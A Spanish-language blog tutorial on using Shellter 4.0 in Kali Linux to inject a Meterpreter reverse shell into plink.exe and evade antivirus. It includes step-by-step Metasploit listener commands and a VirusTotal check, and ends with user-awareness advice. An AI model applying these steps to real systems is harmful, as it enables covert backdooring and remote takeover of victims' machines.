Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Buscador

Entradas Mensuales

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

Foro de elhacker.net - Noticias

elhacker.NET en Facebook

Entradas populares

PostHeaderIcon Evadir el Anti-Virus con Shellter 4.0 en Kali Linux




¿Tienes problemas para conseguir una shell de Meterpreter por culpa del molesto Antivirus? Echa un vistazo a el nuevo programa de ofuscación shell Shellter 4.0. La última versión de Shellter para pentesters fue revelado en B-Sides de Lisboa a principios de este mes. Actualizaciones incluyen el aumento de la ofuscación a través de un codificador y decodificador de encargo polimórfico. También esta versión ahorra unos pasos mediante la inclusión de las shells Meterpreter más comunes.





La idea es evadir, sobretodo, las firmas de los antivirus. La idea es la de conseguir que un binario, manteniendo su funcionalidad, deje de ser reconocido por los motores de antimalware

Shellter funciona tomando un archivo légitmo .exe de Windows, añadiendo el código shell para él y luego hace un gran trabajo de modificar el archivo para hacer el bypass del Antivirus. El Modo automático del programa hace que todo el proceso muy sin muchos problemas.

¿Qué es Shellter?

Ofuscación de binarios

Shellter es una herramienta de inyección de código de shells dinámicas, y probablemente el primero infector de PE dinámico jamás creado. Se puede utilizar para inyectar código shell en las aplicaciones nativas de Windows (en la actualidad sólo soporta aplicaciones de 32 bits).

El código shell puede ser algo tuyo o algo generado a través de un marco, como Metasploit.

Shellter se aprovecha de la estructura original del archivo PE y no se aplica ninguna modificación como cambiar los permisos de acceso de memoria en las secciones (a menos que el usuario lo desee), añadiendo una sección extra con acceso RWE, y todo lo que se vería poco fiables bajo una exploración AV .

Shellter utiliza un enfoque dinámico único que se basa en el flujo de ejecución de la aplicación de destino.

Principales Características

  • Compatible con Windows (XP SP3 y superiores) y con wine / CrossOver para Linux / Mac.
  • No se requiere ninguna configuración - Portable.
  • No requiere dependencias adicionales (python, .net, etc ...).
  • No afecta el tamaño de salida (lo que das es lo que obtienes).
  • No hay plantillas PE estáticas, envolturas marco etc ...
  • Soporta cualquier carga útil de 32 bits (generada ya sea por Metasploit o propios creados por el usuario).
  • Soporta todos los tipos de codificación de Metasploit.
  • Soporta codificación personalizada creada por el usuario.
  • Codificación patentada.
  • Multi-Payload PE infection
  • Soporta cargadores DLL loaders.
  • Las cargas útiles Metasploit Embedded.
  • Código no deseado motor polimórfico.
  • Contexto Tema motor polimórfico conscientes.
  • El usuario puede utilizar el código personalizado polimórfica de los suyos.
  • Toma ventaja de la información de Dynamic Thread Context para el análisis anti-estático.
  • Detecta código mutante.
  • Rastrea aplicaciones individuales y multi-hilo.
  • Lugares de Inyección totalmente dinámico basado en el flujo de ejecución.
  • Desmonta y espectáculos a los puntos de inyección disponibles usuario.
  • El usuario elige qué inyectar, cuándo y dónde.
  • Soporte de línea de comandos.
  • Gratuito
Shellter nos pregunta si queremos activar el modo sigiloso

Podemos elegir entre los payloads disponibles para que se inyecten en el binario. Tenemos diferentes tipos de Meterpreter, la típica shell inversa TCP y la shell bindeada TCP.

Además, un payload inline como es WinExec. Lo que nos preguntará Shellter es si queremos utilizar el listado que nos proporciona o queremos utilizar un listado personalizado, mediante importación de shellcodes.

El payload es encodeado automáticamente, y posteriormente nos muestra más información sobre los métodos de la API a utilizar, sobre la ofuscación o el código polimórfico denominado basura.

Ejemplo - Demostración de Shellter 4.0 en Kali Linux


En este tutorial se ha utilizado la versión más reciente de Kali Linux y una máquina virtual de Windows 7.


1. Descarga e instala "Shellter" de:


** Nota: los repos Kali aparentemente no contienen la versión más reciente 4.0 todavía. Para obtener la última, en lugar de utiliza


apt-get install Shellter

sólo tiene que descargar y extraer el archivo ZIP en la carpeta "/etc/share".


Kali Linux:

apt-get update
apt-get install shellter

BackBox Linux:


apt-get update
apt-get install shellter
Arch Linux:


yaourt -Syy
yaourt -S aur/shellter


2. Coge el fichero "plink.exe" del directorio 'usr/share/windows-binaries' de Kali y copiarlo en el directorio Shellter.

3. Arrancar Shellter - 'Shellter' en el terminal o usa "wine shelter" desde '/ etc / share / Shellter' si ha instalado manualmente.



 4. Seleccione "A" para el modo automático
5. En el símbolo del PE de destino, escriba "plink.exe"
6. Cuando se le solicite por el PayLoad seleccione "L" y luego "1"


7. A continuación, introduzca la dirección IP de su sistema de Kali (en nuestro ejemplo es 192.168.1.39) 8. Y el puerto de usar (yo usé 5555)


Shellter ofuscará el código. Entonces deberías ver:


¡Perfecto!

9. Ahora tenemos que iniciar un servicio de escucha en el sistema de Kali con la misma configuración de arriba:

• iniciar Metasploit ('msfconsole' en un terminal)
• Uso explotar / multi / handler
• Ventanas conjunto de carga útil / meterpreter / reverse_tcp
• establecer lhost 192.168.1.39
• establecer lport 5555
• exploit

10. Ahora que Kali está esperando una conexión. Copie nuestro comando plink.exe el mal con el sistema Windows 7 y lo ejecutas:


Y ya tenemos la shell:


Compara el tamaño del exe backdoored con el original. Son exactamente del mismo tamaño! Ahora carga el exe backdoored a Virustotal y escanearlo para ver si detecta el contenido malicioso :



Sólo un Motor antivirus lo detecta como malicioso. Y no era un AV convencional que normalmente se encuentran en las empresas ...

Conclusión Como se puede ver, un archivo backdoored para eludir el AV se puede crear muy fácilmente.

El AntiVirus es genial, pero no puede dejar de todo, es necesario capacitar a los usuarios de la empresa para estar atentos al utilizar sitios de Internet, redes sociales y correo electrónico.

Evite sitios web sospechosos, no permita ventanas emergentes de sitios web o avisos que instalar nada y nunca abrir archivos adjuntos no solicitados o sospechosas en los correos electrónicos. Si usted no sabe si debe hacer clic en algo, pregunte a su departamento de TI. Un poco de vigilancia usuario puede recorrer un largo camino en la protección de su red!


Fuentes:
https://cyberarms.wordpress.com/2015/07/12/anti-virus-bypass-with-shellter-4-0-on-kali-linux/
http://www.elladodelmal.com/2016/04/veil-evasion-shellter-payday-para.html

0 comentarios :

Publicar un comentario en la entrada

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.